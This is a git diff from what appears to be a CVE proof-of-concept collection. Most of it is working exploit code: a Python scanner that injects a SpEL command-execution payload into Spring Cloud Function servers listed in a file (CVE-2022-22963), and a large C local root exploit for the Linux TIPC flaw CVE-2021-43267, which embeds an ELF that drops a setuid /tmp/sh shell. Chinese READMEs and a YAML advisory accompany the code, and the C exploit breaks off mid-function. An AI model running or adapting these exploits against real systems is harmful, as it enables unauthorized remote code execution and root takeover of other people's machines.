a/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py +++ b/cve/java-spring/2022/CVE-2022-22963/CVE-2022-22963-POC.py @@ -1,59 +1,59 @@ -import requests -import sys -import threading -import urllib3 -urllib3.disable_warnings() - - -def scan(txt,cmd): - - payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")' - - data ='test' - headers = { - 'spring.cloud.function.routing-expression':payload, - 'Accept-Encoding': 'gzip, deflate', - 'Accept': '*/*', - 'Accept-Language': 'en', - 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', - 'Content-Type': 'application/x-www-form-urlencoded' - } - path = '/functionRouter' - f = open(txt) - urllist=f.readlines() - - for url in urllist : - url = url.strip('\n') - all = url + path - try: - req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3) - code =req.status_code - text = req.text - rsp = '"error":"Internal Server Error"' - - if code == 500 and rsp in text: - print ( f'[+] { url } is vulnerable' ) - poc_file = open('vulnerable.txt', 'a+') - poc_file.write(url + '\n') - poc_file.close() - else: - print ( f'[-] { url } not vulnerable' ) - - except requests.exceptions.RequestException: - print ( f'[-] { url } detection timed out' ) - continue - except: - print ( f'[-] { url } error' ) - continue - - - -if __name__ == '__main__' : - try: - cmd1 =sys.argv[1] - t = threading . Thread ( target = scan ( cmd1 , 'whoami' ) ) - t.start() - except: - print ( 'Usage:' ) - print('python poc.py url.txt') +import requests +import sys +import threading +import urllib3 +urllib3.disable_warnings() + + +def scan(txt,cmd): + + payload=f'T(java.lang.Runtime).getRuntime().exec("{cmd}")' + + data ='test' + headers = { + 'spring.cloud.function.routing-expression':payload, + 'Accept-Encoding': 'gzip, deflate', + 'Accept': '*/*', + 'Accept-Language': 'en', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', + 'Content-Type': 'application/x-www-form-urlencoded' + } + path = '/functionRouter' + f = open(txt) + urllist=f.readlines() + + for url in urllist : + url = url.strip('\n') + all = url + path + try: + req=requests.post(url=all,headers=headers,data=data,verify=False,timeout=3) + code =req.status_code + text = req.text + rsp = '"error":"Internal Server Error"' + + if code == 500 and rsp in text: + print ( f'[+] { url } is vulnerable' ) + poc_file = open('vulnerable.txt', 'a+') + poc_file.write(url + '\n') + poc_file.close() + else: + print ( f'[-] { url } not vulnerable' ) + + except requests.exceptions.RequestException: + print ( f'[-] { url } detection timed out' ) + continue + except: + print ( f'[-] { url } error' ) + continue + + + +if __name__ == '__main__' : + try: + cmd1 =sys.argv[1] + t = threading . Thread ( target = scan ( cmd1 , 'whoami' ) ) + t.start() + except: + print ( 'Usage:' ) + print('python poc.py url.txt') pass \ No newline at end of file diff --git a/cve/java-spring/2022/CVE-2022-22963/README.md b/cve/java-spring/2022/CVE-2022-22963/README.md index 0ab233688b5777d6687ea3f39617d706576aa8f4..0440d772ffc77c7e2c9def2b048f59850b5bfaee 100644 --- a/cve/java-spring/2022/CVE-2022-22963/README.md +++ b/cve/java-spring/2022/CVE-2022-22963/README.md @@ -1,10 +1,10 @@ -# CVE-2022-22963 -CVE-2022-22963 PoC - -Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable. - -# REF -https://github.com/dinosn/CVE-2022-22963 -https://avd.aliyun.com/search?q=CVE-2022-22963 -https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, +# CVE-2022-22963 +CVE-2022-22963 PoC + +Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable. + +# REF +https://github.com/dinosn/CVE-2022-22963 +https://avd.aliyun.com/search?q=CVE-2022-22963 +https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52 \ No newline at end of file diff --git a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml index 496e1ad2d42eaa6e71f2eb46046c8a05838806e7..bd94e2e1bef27ba2ce33834841e6320b71f8f078 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml @@ -1,20 +1,20 @@ -id: CVE-2022-22963 -source: https://github.com/dinosn/CVE-2022-22963 -info: - name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 - severity: critical - description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。 - scope-of-influence: Spring Cloud Function<3.1.7 - reference: - - https://github.com/dinosn/CVE-2022-22963 - - https://avd.aliyun.com/search?q=CVE-2022-22963 - - https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html - - https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94 - cnvd-id: None - kve-id: None - tags: cve2022, spring-framework, 表达式注入 +id: CVE-2022-22963 +source: https://github.com/dinosn/CVE-2022-22963 +info: + name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 + severity: critical + description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。 + scope-of-influence: Spring Cloud Function<3.1.7 + reference: + - https://github.com/dinosn/CVE-2022-22963 + - https://avd.aliyun.com/search?q=CVE-2022-22963 + - https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html + - https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94 + cnvd-id: None + kve-id: None + tags: cve2022, spring-framework, 表达式注入 diff --git a/cve/linux-kernel/2021/CVE-2021-42008/README.md b/cve/linux-kernel/2021/CVE-2021-42008/README.md index 9d3bcccfc65bcd44317be09581786adfb1c732ba..31dc9683d9d2aa14d4aff717f7a12259accff357 100644 --- a/cve/linux-kernel/2021/CVE-2021-42008/README.md +++ b/cve/linux-kernel/2021/CVE-2021-42008/README.md @@ -1,30 +1,30 @@ -# CVE-2021-42008 - -## 漏洞描述 -drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞,用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ,对输入进行解码并保存到 sixpack->cooked_buf ,sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标,确定写入解码字节的目标偏移。问题是如果多次调用decode_data(),rx_count_cooked就会一直递增,直到超过 cooked_buf 的长度(400字节),导致越界写。 - -## 测试环境配置 -Linux-v5.13.12 测试环境见`env/` - -原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64,如果适配其他版本,需修改 sp->cooked_buf 和下一个对象的距离。 - -编译选项:CONFIG_6PACK=y CONFIG_AX25=y - -在编译时将.config中的CONFIG_E1000和CONFIG_E1000E,变更为=y。 - -本文exp用到了userfaultfd,但5.11版本开始限制了用户对userfaultfd的使用,所以需根据 first patch 和 second patch 补丁进行回退(去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可)。 - -```bash -$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz -$ tar -xvf linux-5.13.12.tar.xz -# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。 -$ make -j32 -$ make all -$ make modules -# 编译出的bzImage目录:/arch/x86/boot/bzImage。 -``` - -## 保护机制 -KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY - +# CVE-2021-42008 + +## 漏洞描述 +drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞,用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ,对输入进行解码并保存到 sixpack->cooked_buf ,sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标,确定写入解码字节的目标偏移。问题是如果多次调用decode_data(),rx_count_cooked就会一直递增,直到超过 cooked_buf 的长度(400字节),导致越界写。 + +## 测试环境配置 +Linux-v5.13.12 测试环境见`env/` + +原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64,如果适配其他版本,需修改 sp->cooked_buf 和下一个对象的距离。 + +编译选项:CONFIG_6PACK=y CONFIG_AX25=y + +在编译时将.config中的CONFIG_E1000和CONFIG_E1000E,变更为=y。 + +本文exp用到了userfaultfd,但5.11版本开始限制了用户对userfaultfd的使用,所以需根据 first patch 和 second patch 补丁进行回退(去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可)。 + +```bash +$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz +$ tar -xvf linux-5.13.12.tar.xz +# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。 +$ make -j32 +$ make all +$ make modules +# 编译出的bzImage目录:/arch/x86/boot/bzImage。 +``` + +## 保护机制 +KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY + 引用自[bsauce](https://www.jianshu.com/p/d4d2874ed356) \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-43267/exploit.c b/cve/linux-kernel/2021/CVE-2021-43267/exploit.c index c8793f63fbdb51632fcc5d6cb0410ef5eda63cec..15558149954ebd29a0a1f6f0d16644a196e03eae 100644 --- a/cve/linux-kernel/2021/CVE-2021-43267/exploit.c +++ b/cve/linux-kernel/2021/CVE-2021-43267/exploit.c @@ -1,749 +1,749 @@ -/* - * Local PoC exploit for CVE-2021-43267 [1] - * - * I want to see someone make a remote exploit for this. - * - * Only really tested on my local copy of 5.15. But given that you need the - * TIPC module loaded it is unlikely scriptkiddies will have a use for this. - * - * Exploit is a bit CTF quality. Feel free to send me revised copies. - * - * Enjoy! - * - * [1] https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow- - * allows-arbitrary-code-execution/ - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -// these are offsets for my kernel, not yours -#define PTM_UNIX98_OPS 0x127f840 // \__ no exported syms, look for xref to str -#define PTS_UNIX98_OPS 0x127f960 // / `Couldn't allocate Unix98 ptm driver` -#define MODPROBE_PATH 0x16500E0 // has symbol -#define GADGET_WRITE32 0x2c51f5 // 31 c0 48 89 32 c3 -#define GADGET_RET 0x2c51fa // c3 - -// good numbers -#define KEY_SIZE 956 -#define MSG_COUNT 2048 -#define BODY_SIZE 976 -#define SMASH_SIZE 32 -#define TRIES_MAX 8 -#define NEXT_OFFSET 0x8000 - -// some constants -#define NODE_ID 0x11223344 -#define MTYPE 0xAB /* Ac1db34v3rz */ -#define SPRAY_TTY_CNT 0x40 -#define TTY_MAGIC 0x5401 -#define TIPC_UDP_PORT 6118 -#define MSG_COPY 040000 - -// TIPC crap -#define TIPC_VERSION 2 - -// user messages -#define LINK_PROTOCOL 7 -#define LINK_CONFIG 13 - -// message types -#define STATE_MSG 0 -#define RESET_MSG 1 -#define ACTIVATE_MSG 2 -#define MSG_CRYPTO 14 - -// media types -#define MEDIA_TYPE_UDP 3 - -// w0 -#define hdr_msg_size(v) ((v) & 0x1ffff) -#define hdr_size(v) ((v & 0xf) << 21) -#define hdr_user(v) ((v & 0xf) << 25) -#define hdr_nonseq(v) ((v & 1) << 20) -#define hdr_version(v) ((v & 7) << 29) - -// w1 -#define hdr_msg_type(v) ((v & 7) << 29) - -// w2 -#define hdr_link_level_seq(v) (v & 0xffff) - -// w4 -#define hdr_next_send_pkt(v) (v & 0xffff) - -// w5 -#define hdr_media_id(v) (v & 0xff) -#define hdr_session_number(v) ((v & 0xffff) << 16) - -// prototypes -struct message_t { - long type; - uint8_t body[BODY_SIZE]; -}; - -// globals -int g_sockfd = 0; -struct sockaddr_in g_sockaddr; - -// utility -#define info(fmt, args...) report('$', false, fmt, ## args) -#define infov(fmt, args...) report('~', false, fmt, ## args) -#define maybe(fmt, args...) report('?', false, fmt, ## args) -#define fatal(fmt, args...) report('!', true, fmt, ## args) -#define info_value64(name, value) infov("%-24s: %016lx", name, value) - -void report(char indicator, bool error, const char *fmt, ...) { - FILE *stream = (error) ? stderr : stdout; - va_list a; - va_start(a, fmt); - fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : ""); - vfprintf(stream, fmt, a); - fprintf(stream, "\n"); - va_end(a); - - if (error) { - exit(-1); // all errors are fatal - } -} - -void usage(char *prog) { - printf("usage: %s \n\n", prog); -} - -static inline void write64(uint8_t *p, uint64_t v) { - *(uint64_t*)(p) = v; -} - -static inline uint64_t read64(uint8_t *p) { - return *(uint64_t*)(p); -} - -#define be32 htonl - -// netlink -int netlink_send( - uint16_t type, uint16_t flags, uint32_t seq, - uint8_t* pkt, size_t pkt_len, - uint8_t **reply_buf, size_t *reply_sz -) { - int sock_fd; - struct sockaddr_nl sa; - memset(&sa, 0, sizeof(struct sockaddr_nl)); - sa.nl_family = AF_NETLINK; - - size_t pkt_full_len = sizeof(struct nlmsghdr) + pkt_len; - uint8_t *pkt_full = malloc(pkt_full_len); - memset(pkt_full, 0, pkt_full_len); - memcpy(pkt_full + sizeof(struct nlmsghdr), pkt, pkt_len); - - struct nlmsghdr *netlink_hdr = (struct nlmsghdr*)(pkt_full); - netlink_hdr->nlmsg_len = pkt_full_len; - netlink_hdr->nlmsg_type = type; - netlink_hdr->nlmsg_flags = flags; - netlink_hdr->nlmsg_seq = seq; - netlink_hdr->nlmsg_pid = getpid(); - - if ((sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC)) < 0) { - perror("socket"); - return -1; - } - - if (bind(sock_fd, (struct sockaddr*)&sa, sizeof(sa)) < 0) { - perror("bind"); - return -1; - } - - ssize_t r = sendto( - sock_fd, pkt_full, pkt_full_len, 0, - (struct sockaddr*)&sa, sizeof(struct sockaddr_nl) - ); - - if (r < 0) { - perror("sendto"); - return -1; - } - - free(pkt_full); - - if (reply_buf != NULL) { - struct msghdr m; - memset(&m, 0, sizeof(struct msghdr)); - m.msg_iovlen = 1; - m.msg_iov = malloc(sizeof(struct iovec)); - m.msg_iov->iov_base = malloc(0x1000); - m.msg_iov->iov_len = 0x1000; - - size_t nread; - - if ((nread = recvmsg(sock_fd, &m, 0)) < 0) { - goto error; - } - - if (m.msg_iovlen != 1) { - goto error; - } - - *reply_sz = nread; - *reply_buf = malloc(*reply_sz); - memcpy(*reply_buf, m.msg_iov->iov_base, *reply_sz); - free(m.msg_iov->iov_base); - } - - close(sock_fd); - return 0; - -error: - close(sock_fd); - return -1; -} - -int netlink_enable_tipc_udp(char *str_ip_address) { - uint8_t pkt_ctrl[]={ - 0x03, 0x01, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, - 0x10, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x02, 0x00, - 0x54, 0x49, 0x50, 0x43, 0x76, 0x32, 0x00, 0x00 - }; - - uint8_t *nl_reply; - size_t nl_reply_len = 0; - uint32_t ip_addr; - uint32_t seq; - int r; - - seq = time(NULL); - - ip_addr = inet_addr(str_ip_address); - if (ip_addr == INADDR_NONE) { - fatal("invalid ip address given"); - } - - r = netlink_send( - NLMSG_MIN_TYPE, (NLM_F_REQUEST | NLM_F_ACK), seq, - pkt_ctrl, sizeof(pkt_ctrl), &nl_reply, &nl_reply_len - ); - - if(r < 0) { - fatal("failed to send netlink control message."); - } - - if (nl_reply_len == 0) { - fatal("did not get netlink control message reply."); - } - - if (*(uint32_t*)(nl_reply + 0x10) == 0xfffffffe) { - fatal("tipc support not available."); - } - - uint16_t nlmsg_type = 0; - off_t pos = 0x14; - - while(pos < nl_reply_len - 4) { - struct nlattr *attr = (struct nlattr*)(nl_reply + pos); - if (attr->nla_type == 1) { - nlmsg_type = *(uint16_t*)(nl_reply + pos + 4); - break; - } - pos += attr->nla_len; - if ((attr->nla_len % 4) != 0) { - pos += 4 - (attr->nla_len % 4); - } - } - - if (nlmsg_type == 0) { - fatal("could not find tipc netlink message type."); - } - - uint8_t pkt_tipc_enable_udp[]={ - 0x03, 0x01, 0x00, 0x00, 0x40, 0x00, 0x01, 0x80, - 0x0d, 0x00, 0x01, 0x00, 0x75, 0x64, 0x70, 0x3a, - 0x55, 0x44, 0x50, 0x31, 0x00, 0x00, 0x00, 0x00, - 0x2c, 0x00, 0x04, 0x80, 0x14, 0x00, 0x01, 0x00, - 0x02, 0x00, 0x17, 0xe6, 0x00, 0x00, 0x00, 0x00, // <-- +0x24 = ip - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x14, 0x00, 0x02, 0x00, 0x02, 0x00, 0x17, 0xe6, - 0xe4, 0x00, 0x12, 0x67, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00 - }; - - *(uint32_t*)(pkt_tipc_enable_udp + 0x24) = ip_addr; - - r = netlink_send( - nlmsg_type, (NLM_F_REQUEST | NLM_F_ACK), seq, - pkt_tipc_enable_udp, sizeof(pkt_tipc_enable_udp), NULL, NULL - ); - - if (r < 0) { - fatal("failed to send netlink tipc udp enable message."); - } - - // the right way is to read back a netlink reply and check if this worked.. - // I chose to go with the scientifically proven method of big chillin' - sleep(2); - - return 0; -} - -// tipc packet routines -void gen_tipc_hdr( - uint8_t *o, - uint32_t w0, uint32_t w1, uint32_t w2, - uint32_t w3, uint32_t w4, uint32_t w5 -) { - uint32_t* o32 = (uint32_t*)o; - o32[0] = be32(w0); - o32[1] = be32(w1); - o32[2] = be32(w2); - o32[3] = be32(w3); - o32[4] = be32(w4); - o32[5] = be32(w5); -} - -ssize_t tipc_send(uint8_t *buf, size_t sz) { - return sendto( - g_sockfd, buf, sz, 0, (struct sockaddr*)&g_sockaddr, sizeof(g_sockaddr) - ); -} - -void tipc_discover() { - uint32_t w0, w1, w2, w3, w4, w5; - uint8_t pkt[24]; - w0 = 0; - w0 |= hdr_version(TIPC_VERSION); - w0 |= hdr_size(6); - w0 |= hdr_msg_size(24); - w0 |= hdr_user(LINK_CONFIG); - w0 |= hdr_nonseq(1); - w1 = 0; - w2 = 0; - w3 = NODE_ID; - w4 = 0x1267; - w5 = hdr_media_id(MEDIA_TYPE_UDP); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - tipc_send(pkt, sizeof(pkt)); -} - -void tipc_link_state_a(uint32_t ip) { - uint8_t pkt[56]; - uint32_t *body = (uint32_t*)(pkt + 24); - uint32_t w0, w1, w2, w3, w4, w5; - - memset(pkt, 0, sizeof(pkt)); - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(10); - w0 |= hdr_user(LINK_PROTOCOL); - w0 |= hdr_msg_size(56); - w1 = hdr_msg_type(RESET_MSG); - w2 = hdr_link_level_seq(0x8000); - w3 = NODE_ID; - w4 = hdr_next_send_pkt(1); - w5 = hdr_session_number(50388); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - int pos = 0; - body[pos++] = be32(NODE_ID); - body[pos++] = be32(ip); - body[pos++] = 0; - body[pos++] = be32(3500 << 16); - memcpy(body + 4, "UDP1", 4); - tipc_send(pkt, sizeof(pkt)); -} - -void tipc_link_state_b(uint32_t ip) { - uint8_t pkt[44]; - uint32_t w0, w1, w2, w3, w4, w5; - uint32_t *body = (uint32_t*)(pkt + 24); - - memset(pkt, 0, sizeof(pkt)); - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(10); - w0 |= hdr_user(LINK_PROTOCOL); - w0 |= hdr_msg_size(44); - w1 = hdr_msg_type(STATE_MSG); - w2 = hdr_link_level_seq(1); - w3 = NODE_ID; - w4 = hdr_next_send_pkt(1); - w5 = hdr_session_number(50388); - - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - int pos = 0; - body[pos++] = be32(NODE_ID); - body[pos++] = be32(ip); - body[pos++] = 0; // timestamp - body[pos++] = 0; // max pkt/link tolerance - body[pos++] = 0; // bearer instance - tipc_send(pkt, sizeof(pkt)); -} - -int tipc_link_setup(char *host) { - if ((g_sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { - perror("socket"); - return -1; - } - - memset((char *) &g_sockaddr, 0, sizeof(g_sockaddr)); - g_sockaddr.sin_family = AF_INET; - g_sockaddr.sin_port = htons(TIPC_UDP_PORT); - - if (inet_aton(host, &g_sockaddr.sin_addr) == 0) { - perror("inet_aton"); - return -1; - } - - tipc_discover(); - tipc_link_state_a(be32(inet_addr(host))); - tipc_link_state_b(be32(inet_addr(host))); - - return 0; -} - -void tipc_trigger(uint8_t *smashbuf, uint32_t smashlen, int seqno) { - uint8_t pkt[0x1000]; - uint32_t w0, w1, w2, w3, w4, w5; - - w0 = hdr_version(TIPC_VERSION); - w0 |= hdr_size(6); - w0 |= hdr_user(MSG_CRYPTO); - w0 |= hdr_msg_size(24 + 36 + KEY_SIZE); - w1 = 0; - w2 = seqno; - w3 = NODE_ID; - w4 = 0; - w5 = 0; - - memset(pkt, 0, sizeof(pkt)); - gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5); - - memcpy(pkt+24, "HAXX", 4); - *(uint32_t*)(pkt+24+32) = be32(KEY_SIZE + SMASH_SIZE + smashlen); - memset(pkt+24+36, 'C', KEY_SIZE); - memset(pkt+24+36+KEY_SIZE, 'D', SMASH_SIZE); - memcpy(pkt+24+36+KEY_SIZE + SMASH_SIZE, smashbuf, smashlen); - tipc_send(pkt, sizeof(pkt)); -} - -int setup_modprobe_hax() { - // small ELF file matroshka doll that does; - // fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC); - // write(fd, elfcode, elfcode_len) - // chmod("/tmp/sh", 04755) - // close(fd); - // exit(0); - // - // the dropped ELF simply does: - // setuid(0); - // setgid(0); - // execve("/bin/sh", ["/bin/sh", NULL], [NULL]); - unsigned char elfcode[] = { - 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02, - 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, - 0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, - 0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f, - 0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, - 0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00, - 0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, - 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d, - 0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, - 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, - 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, - 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, - 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, - 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, - 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, - 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, - 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, - 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 - }; - - FILE *fp; - - fp = fopen("/tmp/benign", "wb"); - if (fp == NULL) { - perror("fopen"); - return -1; - } - - if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) { - perror("fwrite"); - return -1; - } - fclose(fp); - - fp = fopen("/tmp/hax", "wb"); - if (fp == NULL) { - perror("fopen"); - return -1; - } - - if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) { - perror("fwrite"); - return -1; - } - fclose(fp); - - if (chmod("/tmp/benign", 0777) < 0) { - perror("chmod"); - return -1; - } - - if (chmod("/tmp/hax", 0777) < 0) { - perror("chmod"); - return -1; - } - - return 0; -} - -int main(int argc, char *argv[]) { - uint64_t pty_ops = 0; - uint64_t mybuf = 0; - uint64_t kernel_base = 0; - - uint8_t fake_tty[0x20]; - uint8_t peekbuf[0x2000]; - - int peek_cnt = 1; - int seqno=0; - - int tty_fds[SPRAY_TTY_CNT]; - int queue_id[MSG_COUNT]; - int queue_id_final = 0; - - struct message_t dummy; - dummy.type = MTYPE; - memset(dummy.body, 0x58, BODY_SIZE); - - fprintf(stdout, - "\n" - " $$$ Linux 5.10-5.15 CVE-2021-43267 exploit $$$\n" - " -- by blasty --\n\n" - ); - - if (argc != 2) { - usage(argv[0]); - return -1; - } - - info("enabling tipc udp media"); - if (netlink_enable_tipc_udp(argv[1]) < 0) { - fatal("failed to enable tipc udp media"); - } - - info("establish tipc link"); - if (tipc_link_setup(argv[1]) < 0) { - fatal("failed to establish tipc link"); - } - - info("installing helpers"); - if (setup_modprobe_hax() < 0) { - fatal("failed to setup helpers"); - } - - info("create messages queues"); - if ((queue_id_final = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { - perror("msgget"); - fatal("failed to create message queue"); - } - - for(int i = 0; i < MSG_COUNT; i++) { - if ((queue_id[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { - perror("msgget"); - fatal("failed to create message queue %d", i); - } - } - - info("spray messages"); - for(int i = 0; i < MSG_COUNT; i++) { - if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { - perror("msgsnd"); - fatal("failed to create message in queue %d", i); - } - } - - info("poking holes"); - for(int i = 0; i < MSG_COUNT; i += 2) { - if(msgrcv(queue_id[i], (void*)&dummy, 